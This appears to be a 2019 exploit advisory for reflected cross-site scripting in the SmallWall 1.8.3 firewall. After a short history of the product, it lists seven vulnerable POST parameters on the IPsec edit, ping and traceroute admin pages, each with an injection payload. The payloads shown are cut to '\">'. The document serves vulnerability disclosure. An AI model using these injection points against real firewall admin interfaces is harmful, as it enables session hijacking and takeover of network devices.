################################################################################################################################## # Exploit Title: SmallWall 1.8.3 | Cross-Site Scripting # Date: 02.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: http://www.smallwall.org # Software Link: http://www.smallwall.org/downloads/generic-pc-1.8.3.iso # Version: 1.8.3 ################################################################################################################################## Introduction A long time ago, a very smart guy asked a very simple question. "Why do firewalls have to be big, slow, and hard to configure?" And he created m0n0wall. "m0n0wall was a project aimed at creating a complete, embedded firewall software package that, when used together with an embedded PC, provided all the important features of commercial firewall boxes (including ease of use) at a fraction of the price (free software)." At this, it was amazingly successful. So successful that the FreeBSD based core was used as a basis for several other projects such as pfSense, Askozia, FreeNAS, and nas4free. Recently, a grandchild of m0n0wall was spawned from pfSense, OPNSense. But, m0n0wall has retired now, and some of us still feel the need for a small and lean firewall. SmallWall is that firewall. ################################################################################# XSS details: Reflected ################################################################################# XSS1 | Reflected URL http://192.168.2.200/vpn_ipsec_edit.php METHOD Post PARAMETER remotenet PAYLOAD "> ################################################################################# XSS2 | Reflected URL http://192.168.2.200/vpn_ipsec_edit.php METHOD Post PARAMETER remotegw PAYLOAD "> ################################################################################# XSS3 | Reflected URL http://192.168.2.200/vpn_ipsec_edit.php METHOD Post PARAMETER p1myident PAYLOAD "> ################################################################################# XSS4 | Reflected URL http://192.168.2.200/vpn_ipsec_edit.php METHOD Post PARAMETER p1lifetime PAYLOAD "> ################################################################################# XSS5 | Reflected URL http://192.168.2.200/vpn_ipsec_edit.php METHOD Post PARAMETER p2lifetime PAYLOAD "> ################################################################################# XSS6 | Reflected URL http://192.168.2.200/diag_ping.php METHOD Post PARAMETER host PAYLOAD "> ################################################################################# XSS7 | Reflected URL http://192.168.2.200/diag_traceroute.php METHOD Post PARAMETER host PAYLOAD "> #################################################################################